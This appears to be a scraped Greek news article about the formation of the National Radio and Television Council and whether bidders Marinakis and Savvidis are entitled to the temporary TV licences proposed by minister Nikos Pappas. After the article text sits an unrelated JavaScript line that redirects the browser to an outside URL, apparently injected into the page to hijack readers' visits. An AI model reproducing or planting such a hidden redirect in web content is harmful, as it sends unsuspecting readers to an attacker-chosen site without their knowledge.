Δικαιούνται προσωρινή άδεια Μαρινάκης-Σαββίδης; Κάποιοι λένε όχι

0
11

Ο πρόεδρος της Βουλής Νίκος Βούτσης συγκαλεί το απόγευμα της Δευτέρας τη διάσκεψη των προέδρων της Βουλής, με στόχο τη συγκρότηση του Εθνικού Συμβουλίου Ραδιοτηλεόρασης. Ωστόσο, δεν είναι καθόλου βέβαιο ότι θα συναινέσει η ΝΔ αν προηγουμένως δεν ξεκαθαριστεί ότι στην Ανεξάρτητη Αρχή θα δοθούν πλήρεις αρμοδιότητες.

Πρόβλημα μπορεί να υπάρξει, ακόμη, και με τη νομοθετική πρωτοβουλία που ετοιμάζει ο υπουργός Επικρατείας. Η λεγόμενη βεβαίωση λειτουργίας των τηλεοπτικών σταθμών αναμένεται να σταλεί στη Βουλή το αργότερο την Τρίτη και θα περιλαμβάνει -όπως έχει ήδη δηλώσει ο Νίκος Παππάς– προσωρινή άδεια για τους υπάρχοντες τηλεοπτικούς σταθμούς, με «ενοίκιο» της τάξης των 6 ή 7 εκατ ευρώ για κάθε ένα.

Τι θα γίνει με τους δυο «υπερθεματιστές» Βαγγέλη Μαρινάκη και Ιβάν Σαββίδη; Κατά τον κ. Παππά θα λάβουν και εκείνοι προσωρινή άδεια, επειδή συμμετείχαν στον διαγωνισμό και κέρδισαν άδεια.  Ωστόσο, ο νόμος κρίθηκε αντισυνταγματικός, πράγμα που σημαίνει ότι ο διαγωνισμός είναι άκυρος από την αρχή έως το τέλος. Πολλοί, λοιπόν, εκτιμούν ότι δεν μπορούν να πάρουν άδεια τώρα, αλλά μόνο αν συμμετάσχουν στο διαγωνισμό που θα διενεργήσει (οψέποτε) το ΕΣΡ και προσφέρουν τα χρήματα που θα ζητήσει η Ανεξάρτητη Αρχή. Πολύ περισσότερο που δεν καλύπτουν και τις άλλες πρόνοιες του νόμου Παππά, δηλαδή δεν έχουν προς το παρόν εγκαταστάσεις, ούτε 400 εργαζόμενους…

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here